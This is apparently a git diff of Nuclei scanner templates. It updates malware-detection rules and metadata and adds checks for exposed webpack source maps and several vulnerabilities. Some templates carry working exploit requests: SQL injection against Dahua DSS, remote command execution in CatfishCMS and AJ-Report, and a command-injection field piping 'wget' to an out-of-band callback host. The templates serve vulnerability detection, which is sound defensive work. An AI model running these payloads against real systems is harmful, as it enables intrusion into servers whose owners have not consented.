@@ -4,13 +4,15 @@ info:
name: Cerberus Malware - Detect
author: daffainfo
severity: info
- reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar
+ reference:
+ - https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar
tags: malware,file
+
file:
- extensions:
- all
- matchers-condition: or
+ matchers-condition: and
matchers:
- type: word
part: raw
@@ -25,5 +27,4 @@ file:
words:
- "cerberus"
case-insensitive: true
-
-# digest: 490a00463044022006c23cd80a8b9974883e26b0cfb251e5834a1340be09efe1c38d397f5ea1b9470220723d8425e377276fde160744c4191d1496a8ad12d48084235c96fc995c3deace:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200678f44915a5092567fbd406db0b2f65cef3054cdfcead092d2c7b6948b4a1140221009fc67f2da5ca58feecf9cbae46120b737b1d0c4f70697c4cb8c2aea828a3d4be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/file/malware/warp-malware.yaml b/file/malware/warp-malware.yaml
index bcf2e9b53a..eb34685944 100644
--- a/file/malware/warp-malware.yaml
+++ b/file/malware/warp-malware.yaml
@@ -18,10 +18,9 @@ file:
- "/2011/n325423.shtml?"
- "wyle"
- "\\~ISUN32.EXE"
- condition: or
+ condition: and
- type: binary
binary:
- "80382B7503C6002D80382F7503C6005F"
-
-# digest: 4a0a00473045022100841926e56850756403c4d4035ecc9b7d08e8e0642b013dea6df56a912a82b6c402202ee68a5dcea7ca1703fe713ad85fe77313fc855e95a50ff72976487416ef564c:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e80f4b2dd4f9e9816231f6df6fe61c3565dece76d808a3a46eb8834f63cf0400022100a6c76dfe0cf46ebb373f0eb870535044d5b9cbb980fc1ec329159a2ca6e263e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/headless/webpack-sourcemap.yaml b/headless/webpack-sourcemap.yaml
new file mode 100644
index 0000000000..0da0eff55f
--- /dev/null
+++ b/headless/webpack-sourcemap.yaml
@@ -0,0 +1,221 @@
+id: webpack-sourcemap
+
+info:
+ name: Webpack Sourcemap
+ author: lucky0x0d,PulseSecurity.co.nz
+ severity: low
+ description: |
+ Detects if Webpack source maps are exposed.
+ impact: |
+ Exposure of source maps can leak sensitive information about the application's source code and potentially aid attackers in identifying vulnerabilities.
+ remediation: |
+ Ensure that Webpack source maps are not exposed to the public by configuring the server to restrict access to them.
+ reference:
+ - https://pulsesecurity.co.nz/articles/javascript-from-sourcemaps
+ - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage
+ tags: javascript,webpack,sourcemaps
+
+headless:
+ - steps:
+ - args:
+ url: "{{BaseURL}}"
+ action: navigate
+
+ - action: sleep
+ args:
+ duration: 10
+
+ - action: script
+ name: extract
+ args:
+ code: |
+ () => {
+ AAA = [];
+ window.performance.getEntriesByType("resource").forEach((element) => { if (element.initiatorType === 'script' || element.initiatorType === 'fetch'|| element.initiatorType === 'xmlhttprequest') {AAA.push(element.name)}});
+ BBB = [...new Set(Array.from(document.querySelectorAll('script')).map(i => i.src))]
+ CCC = [...new Set(Array.from(document.querySelectorAll('link[as=script]')).map(i => i.href))]
+ return [...new Set([...AAA, ...BBB, ...CCC])];
+ }
+
+ extractors:
+ - type: regex
+ name: allscripts
+ internal: true
+ part: extract
+ regex:
+ - (?i)http(.[~a-zA-Z0-9.\/\-_:]+)
+flow: |
+ headless();
+ http("check_base_srcmap_inline");
+ for (let scripturi of iterate(template["allscripts"])) {
+ set ("scripturi", scripturi);
+ http("check_for_srcmap_header");
+ http("check_for_srcmap_inline");
+ http("check_for_srcmap_url");
+ for (let mapuri of iterate(template["allmaps"])) {
+ set ("mapuri", mapuri);
+ http("fetch_absolute_srcmap");
+ http("fetch_relative_srcmap");
+ http("fetch_root_relative_srcmap");
+ http("fetch_noscheme_srcmaps");
+ };
+ set ("allmaps", null);
+ };
+
+http:
+ - method: GET
+ id: check_base_srcmap_inline
+ disable-cookie: true
+ redirects: true
+ path:
+ - '{{BaseURL}}'
+
+ matchers:
+ - type: regex
+ name: Inline_SourceMap
+ regex:
+ - '(?i)sourceMappingURL=.*eyJ2ZXJzaW9uIjo'
+
+ - type: regex
+ name: SourceMapConsumer_Present
+ regex:
+ - '(?i)SourceMapConsumer'
+
+ - method: GET
+ id: check_for_srcmap_url
+ disable-cookie: true
+ redirects: true
+ path:
+ - '{{scripturi}}'
+
+ extractors:
+ - type: regex
+ name: allmaps
+ internal: true
+ group: 1
+ regex:
+ - (?i)\/\/#\ssourceMappingURL=(.[~a-zA-Z0-9.\/\-_:]+)
+
+ - method: GET
+ id: check_for_srcmap_inline
+ disable-cookie: true
+ redirects: true
+ path:
+ - '{{scripturi}}'
+
+ matchers:
+ - type: regex
+ name: Inline_SourceMap
+ regex:
+ - '(?i)sourceMappingURL=.*eyJ2ZXJzaW9uIjo'
+
+ - type: regex
+ name: SourceMapConsumer_Present
+ regex:
+ - '(?i)SourceMapConsumer'
+
+ - method: GET
+ id: check_for_srcmap_header
+ disable-cookie: true
+ redirects: true
+ path:
+ - '{{scripturi}}'
+
+ matchers:
+ - type: dsl
+ name: Source_Map_Header
+ dsl:
+ - "regex('(?i)SourceMap', header)"
+ - "status_code != 301 && status_code != 302"
+ condition: and
+
+ extractors:
+ - type: kval
+ kval:
+ - X_SourceMap
+ - SourceMap
+
+ - method: GET
+ id: fetch_absolute_srcmap
+ disable-cookie: true
+ redirects: true
+ path:
+ - '{{mapuri}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ condition: and
+ part: body
+ words:
+ - '"version":'
+ - '"mappings":'
+ - '"sources":'
+
+ - type: status
+ status:
+ - 200
+
+ - method: GET
+ id: fetch_relative_srcmap
+ disable-cookie: true
+ redirects: true
+ path:
+ - '{{replace_regex(scripturi,"([^/]+$)","")}}{{replace_regex(mapuri,"(^\/+)","")}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ condition: and
+ part: body
+ words:
+ - '"version":'
+ - '"mappings":'
+ - '"sources":'
+
+ - type: status
+ status:
+ - 200
+
+ - method: GET
+ id: fetch_root_relative_srcmap
+ disable-cookie: true
+ redirects: true
+ path:
+ - '{{replace_regex(scripturi,replace_regex(scripturi,"http.+//[^/]+",""),"")}}{{mapuri}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ condition: and
+ part: body
+ words:
+ - '"version":'
+ - '"mappings":'
+ - '"sources":'
+
+ - type: status
+ status:
+ - 200
+
+ - method: GET
+ id: fetch_noscheme_srcmaps
+ disable-cookie: true
+ redirects: true
+ path:
+ - '{{Scheme}}{{mapuri}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ condition: and
+ part: body
+ words:
+ - '"version":'
+ - '"mappings":'
+ - '"sources":'
+
+ - type: status
+ status:
+ - 200
+# digest: 490a00463044022037d26b0bf4e1e46e77bcae5925a09f8dd5e8ea38894b06c3a450cac92ae803b5022016539aa792c7f25f571a45c194e983fa46aa24f8980c2829025ebf9e7c4e3b1c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml
new file mode 100644
index 0000000000..832b701428
--- /dev/null
+++ b/http/cnvd/2017/CNVD-2017-06001.yaml
@@ -0,0 +1,37 @@
+id: CNVD-2017-06001
+
+info:
+ name: Dahua DSS - SQL Injection
+ severity: high
+ author: napgh0st,ritikchaddha
+ reference:
+ - https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: app="dahua-DSS"
+ tags: cnvd,cnvd2017,sqli,dahua
+
+variables:
+ num: "999999999"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
+ - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "XPATH syntax error:"
+ - "c8c605999f3d8352d7bb792cf3fdb25"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+# digest: 4b0a00483046022100f369f94051bc8ede985360f3de46c645769896645c53b702a5900b5d7ec68dc3022100db0215796305ea641958244a283b9f55498c217c5151e9f5e96da70c5c7144d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cnvd/2019/CNVD-2019-06255.yaml b/http/cnvd/2019/CNVD-2019-06255.yaml
index 30854ab998..5db72977bb 100644
--- a/http/cnvd/2019/CNVD-2019-06255.yaml
+++ b/http/cnvd/2019/CNVD-2019-06255.yaml
@@ -1,10 +1,11 @@
id: CNVD-2019-06255
info:
- name: CatfishCMS RCE
+ name: CatfishCMS - Remote Command Execution
author: Lark-Lab
severity: critical
- description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
+ description: |
+ CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
reference:
- https://its401.com/article/yun2diao/91344725
@@ -17,17 +18,25 @@ info:
max-request: 1
tags: cnvd,cnvd2019,rce,catfishcms
+flow: http(1) && http(2)
+
http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers:
+ - type: word
+ internal: true
+ words:
+ - 'content="Catfish CMS'
+
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
-
- type: word
words:
- 'OS'
@@ -35,4 +44,8 @@ http:
- 'SHELL'
- 'USER'
condition: and
-# digest: 4a0a0047304502204d8e0b5798f1c1e3c13e8ef2c3b424eec1f93d1849e00deeaaacc6d20f1e3723022100e969db4fef4076f7b5d8ef17b9ed9000685af5228ae0c406796a7c75ff5275ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ - type: status
+ status:
+ - 200
+# digest: 4b0a00483046022100d570edc7b33b2580048fec77b6b2f9f0d57f868585cae9342aab99effc8360cf022100ed0064a22046fe4db93c24d2342e3f3cab562c91cb7ef94b03b1ba4eefdc35bf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cnvd/2021/CNVD-2021-09650.yaml b/http/cnvd/2021/CNVD-2021-09650.yaml
index 5e90506d4b..c506230084 100644
--- a/http/cnvd/2021/CNVD-2021-09650.yaml
+++ b/http/cnvd/2021/CNVD-2021-09650.yaml
@@ -20,7 +20,7 @@ info:
http:
- raw:
- |
- POST /guest_auth/guestIsUp.php
+ POST /guest_auth/guestIsUp.php HTTP/1.1
Host: {{Hostname}}
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
@@ -32,4 +32,4 @@ http:
name: http
words:
- "http"
-# digest: 490a0046304402202d6b248201cb2194c4824f5ec119cef5b993674b0ca7deb993bbb91ce2c4f4e002206eb8515733c686fabf67c25c8b5a3cb2713cf95ec51cd8e696634247b0cb688a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022067cf25f298daa2b560fc63730df160e8dec545619c2157c63da48b60dd2135e8022100eb4e2b096d6e640659ad337e303506d4a65d47211414037ec52449106f264578:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cnvd/2021/CNVD-2021-49104.yaml b/http/cnvd/2021/CNVD-2021-49104.yaml
index 049664ecc2..8c8f8222de 100644
--- a/http/cnvd/2021/CNVD-2021-49104.yaml
+++ b/http/cnvd/2021/CNVD-2021-49104.yaml
@@ -17,6 +17,9 @@ info:
max-request: 2
tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive
+variables:
+ string: "{{randstr}}"
+
http:
- raw:
- |
@@ -28,7 +31,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
Content-Type: image/jpeg
-
+
--e64bdf16c554bbc109cecef6451c26a4--
- |
@@ -37,6 +40,10 @@ http:
matchers-condition: and
matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5(string)}}'
- type: word
part: body
words:
@@ -45,4 +52,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220384c6063def534ec0a814462caa5c044f86fa88e02b0a86416081f5adfd949d7022100fd2c2b727b05bfa5f1a00b106da9e0e3c523181f8d952566e32aab8e266c46db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ae8da93813d42871f37d15afe305c240d7e574d4520a88dbc81b60541e38cb8002207b63daa711b765d9dcaeb71a375769d5f8c09198c379cd6822c5e80f10646597:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cnvd/2024/CNVD-2024-15077.yaml b/http/cnvd/2024/CNVD-2024-15077.yaml
new file mode 100644
index 0000000000..204334b5b4
--- /dev/null
+++ b/http/cnvd/2024/CNVD-2024-15077.yaml
@@ -0,0 +1,45 @@
+id: CNVD-2024-15077
+
+info:
+ name: AJ-Report Open Source Data Screen - Remote Code Execution
+ author: pussycat0x
+ severity: high
+ description: |
+ AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious.
+ reference:
+ - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
+ - https://github.com/vulhub/vulhub/blob/master/aj-report/CNVD-2024-15077/README.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title="AJ-Report"
+ tags: cnvd,cnvd2024,aj-report,rce
+
+http:
+ - raw:
+ - |
+ POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ Content-Type: application/json;charset=UTF-8
+
+ {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "code"
+ - "data"
+ condition: and
+
+ - type: regex
+ part: body
+ regex:
+ - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a00473045022100a0ad6d10ef5ed64fff1a44a4efb42b8c18de347907d77e68fec2a9f796030e8c022003c9c9bcfc6d56d3a3c7988f48874841753487e2ce57d91740ffbe99e3627448:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml
index 1017ec6d7c..913da2da7b 100644
--- a/http/cves/2000/CVE-2000-0114.yaml
+++ b/http/cves/2000/CVE-2000-0114.yaml
@@ -20,12 +20,13 @@ info:
cve-id: CVE-2000-0114
cwe-id: NVD-CWE-Other
epss-score: 0.15958
- epss-percentile: 0.95829
+ epss-percentile: 0.95958
cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microsoft
product: internet_information_server
+ shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server"
tags: cve,cve2000,frontpage,microsoft,edb
http:
@@ -43,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f18bd6804b42bce98cc02cea3261854e17f9d58bcb7034e2dc7289c456c57c0d022100d91840b613c0b2544a15e2ae802e176fea630dee4788fe64c5e40f9082bc1374:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205feaaedc7212d5546b4a1e2b1f6d701d77390a9a19a31d6f45a9150b0da0080a02203ffb16ad768f80c2d873647321189e4c6fa3eff77f84fbc18a3d04d5b7c714f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml
index 57d6042605..8470e08000 100644
--- a/http/cves/2001/CVE-2001-0537.yaml
+++ b/http/cves/2001/CVE-2001-0537.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2001-0537
cwe-id: CWE-287
epss-score: 0.87683
- epss-percentile: 0.98569
+ epss-percentile: 0.98644
cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*
metadata:
verified: true
@@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502201530427f983f1ac47d92a3e00fb141fab33efd4f9ac109b29beca3488669ca5b022100e7ab1cc3fec5da235092a57848d0f83403d81bff12d5ed347ee7d6442b19444c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dcd27cbb0d1546b2d94f702f5298cdf445b5fcea29d9741ab30cdedd59749c2f022009e09962e874a528aea693b7c0c3984cf75ac175451d01bf66ae6a6d6d9f7e75:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml
index 0949ff5738..0422de46ab 100644
--- a/http/cves/2002/CVE-2002-1131.yaml
+++ b/http/cves/2002/CVE-2002-1131.yaml
@@ -27,6 +27,9 @@ info:
max-request: 5
vendor: squirrelmail
product: squirrelmail
+ shodan-query: http.title:"squirrelmail"
+ fofa-query: title="squirrelmail"
+ google-query: intitle:"squirrelmail"
tags: cve,cve2002,edb,xss,squirrelmail
http:
@@ -55,4 +58,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200f73612464ffbb40fb37890f6902c59fd670a8c57eb10a297b6ce6d7d7a68301022100a8ed74ff2523575fbbdb8d5a4a330d69c6a96ef8d97d911a20c1468dfa92aa2e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022079f74e17066a8030a2ff5a3ea6fa4258ba6ec59353823c400a4f933c88b091020220765e9a7f5973726aebe82162e0dc3565fd9f7f6fa15e4f417d5bdd2c0696de1e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml
index c1f874a540..bed100152f 100644
--- a/http/cves/2004/CVE-2004-1965.yaml
+++ b/http/cves/2004/CVE-2004-1965.yaml
@@ -15,13 +15,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2004-1965
- http://marc.info/?l=bugtraq&m=108301983206107&w=2
- https://exchange.xforce.ibmcloud.com/vulnerabilities/15966
+ - https://github.com/POORVAJA-195/Nuclei-Analysis-main
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2004-1965
cwe-id: NVD-CWE-Other
epss-score: 0.0113
- epss-percentile: 0.84351
+ epss-percentile: 0.84626
cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -39,4 +40,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
-# digest: 4a0a0047304502200942a34b2650323617b6c0a05aed0e60c5452d3b77477cfa2760dd51678d7371022100cf0d486cba6f8042c311e7cc3134723dd8e8b86ff44b5cdb22e0adbfe3ba3776:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ed72c7aac1f09f263022943f85c3438ab7bc9d157d128cbef2639c033ff4162802207254eabebe6585d83a8abb17a6163edc0de13410f5bfc937fda5bd940a22f36e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml
index 89f0e31e60..5bf2bf72f8 100644
--- a/http/cves/2005/CVE-2005-3344.yaml
+++ b/http/cves/2005/CVE-2005-3344.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 10
cve-id: CVE-2005-3344
cwe-id: NVD-CWE-Other
- epss-score: 0.02158
- epss-percentile: 0.88203
+ epss-score: 0.01539
+ epss-percentile: 0.87085
cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -47,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b73417184338a145cd434067c3a5affab5f19d715ddcf840193794038d2fe9fc022100ad8926c7c03251c1cf3ed73d9a65bb5c3bee39ea572aad309043f945c6e6f935:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml
index 4488b0a43c..cf64ff3ab9 100644
--- a/http/cves/2005/CVE-2005-3634.yaml
+++ b/http/cves/2005/CVE-2005-3634.yaml
@@ -23,13 +23,14 @@ info:
cve-id: CVE-2005-3634
cwe-id: NVD-CWE-Other
epss-score: 0.02843
- epss-percentile: 0.897
+ epss-percentile: 0.90695
cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sap
product: sap_web_application_server
shodan-query: html:"SAP Business Server Pages Team"
+ fofa-query: body="sap business server pages team"
tags: cve,cve2005,sap,redirect,business,xss
http:
@@ -42,4 +43,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
-# digest: 4b0a004830460221009b702e9a18c644f2a8ddd637cd2d87e35e59ec9159e4726e5b9dbf6cbe27ddcc022100e7fd499cc594ceab440e9188af24fd6eaa6f1eab4514609586796ae41b96b43f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220782d2b8bf481a5915e9c1718c67324b49b8433b1210b910742cd305d0111df63022100840add217ef0fb886c242f1eb329ce349c23c94430c6ec8a74e9f1c887447cc3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml
index 87657dbf27..4cc42895e6 100644
--- a/http/cves/2006/CVE-2006-2842.yaml
+++ b/http/cves/2006/CVE-2006-2842.yaml
@@ -20,13 +20,16 @@ info:
cvss-score: 7.5
cve-id: CVE-2006-2842
cwe-id: CWE-22
- epss-score: 0.25691
- epss-percentile: 0.9628
+ epss-score: 0.28102
+ epss-percentile: 0.96839
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: squirrelmail
product: squirrelmail
+ shodan-query: http.title:"squirrelmail"
+ fofa-query: title="squirrelmail"
+ google-query: intitle:"squirrelmail"
tags: cve,cve2006,lfi,squirrelmail,edb
http:
@@ -43,4 +46,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402204e83bd6e716c336c1660d900f8c08653ace9865180909e88dc35b6180af0634d02205959ac5c89fa3aa04db1f64a614848f8a84c0604fe7f72bad1f63b1c99d8404b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022046dd195f5bf5c276dfb90ef3d9f60f781ae43dab2e02f44963a570ff60e6ea73022001f681cdc292f9f50598231358201650a5333381d856d0c35452e7a9acd3f29a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml
index f3c5829a6c..6035d8bab5 100644
--- a/http/cves/2007/CVE-2007-0885.yaml
+++ b/http/cves/2007/CVE-2007-0885.yaml
@@ -17,7 +17,7 @@ info:
cve-id: CVE-2007-0885
cwe-id: NVD-CWE-Other
epss-score: 0.0093
- epss-percentile: 0.82626
+ epss-percentile: 0.82973
cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402200ed59822b672884f4e50ef40df983fb0862418cede91f6dc96f764425e4bf4e302205b376b90e98b64ced2421151d9636a14d0dd0830c2dee682c77cda12c602e7f1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205ece81e3272a6b93437d5876ec0f1346da324d72a43381b3fd9caca99c4051ad022100e4e03ce4d101a0b9f4fb82a0e85ad58d1ee55d277fb6a190888bb16b1dddb1c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml
index 1a29f75867..913a3cbfcd 100644
--- a/http/cves/2007/CVE-2007-3010.yaml
+++ b/http/cves/2007/CVE-2007-3010.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 10
cve-id: CVE-2007-3010
cwe-id: CWE-20
- epss-score: 0.97317
- epss-percentile: 0.99868
+ epss-score: 0.97313
+ epss-percentile: 0.99874
cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:*
metadata:
verified: true
@@ -31,6 +31,7 @@ info:
product: omnipcx
shodan-query: title:"OmniPCX for Enterprise"
fofa-query: app="Alcatel_Lucent-OmniPCX-Enterprise"
+ google-query: intitle:"omnipcx for enterprise"
tags: cve,cve2007,kev,rce,alcatel
http:
@@ -53,4 +54,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100860fb5fb6459c546fd88f49a316826632cf5a5f32bc9e9a5ce27dce40d150997022100b0b9ecb0467a3de0631a06e2e867b73844a98e132eef931105650d75e196e26f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022077daea5464ae2c99ee724324391edfccb837ce48fc24759bfc0a8aff476eefe8022063a85e8dfe57da9183ac569780803037bd4ac032588a70173d036f1660ae7caa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml
index a2a1196510..08115cea39 100644
--- a/http/cves/2007/CVE-2007-4504.yaml
+++ b/http/cves/2007/CVE-2007-4504.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 5
cve-id: CVE-2007-4504
cwe-id: CWE-22
- epss-score: 0.02599
- epss-percentile: 0.90043
+ epss-score: 0.02171
+ epss-percentile: 0.89338
cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -42,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402207688a03699896a3d8c9a6254539a13ace8813096112296d102ca74fc45a0f17b022036a518c6e517befe270990e5d1a9d992f8b19f1fa36086546a11b544ff84c692:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fa8b85892e423c5bf35a3d7e57c7a6c92369087bccf959a8ad7952dc814ddd64022100e94750ab323e456ccb7dc737ab126a2d5c160b7190e3e70993be80dd1064a3b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml
index aee2258ec2..10f8f1198a 100644
--- a/http/cves/2007/CVE-2007-4556.yaml
+++ b/http/cves/2007/CVE-2007-4556.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 6.8
cve-id: CVE-2007-4556
cwe-id: NVD-CWE-Other
- epss-score: 0.16469
- epss-percentile: 0.95873
+ epss-score: 0.21361
+ epss-percentile: 0.96419
cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -51,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022037e628251b17abd8fa644b564dab5c21ed475158752e510f311df96b9d63497402201bb1673e45a11edc53bdf0a83147c1a87a74c36358ede8fe0f576850c4d4900b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203c4a8474be81263c4f0abab1f0fe57a6779f4cb1d748445fd08dc0dfab5c7131022060ca2bf20c392063d8c3f8c9e03e130f0aec84067f9af1e94c168c914dc21f7d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml
index fe0f7b48ec..45c71789e7 100644
--- a/http/cves/2007/CVE-2007-5728.yaml
+++ b/http/cves/2007/CVE-2007-5728.yaml
@@ -28,6 +28,8 @@ info:
vendor: phppgadmin
product: phppgadmin
shodan-query: http.title:"phpPgAdmin"
+ fofa-query: title=phppgadmin
+ google-query: intitle:phppgadmin
tags: cve2007,cve,xss,pgadmin,phppgadmin,edb
http:
@@ -52,4 +54,4 @@ http:
- type: status
status:
- 200
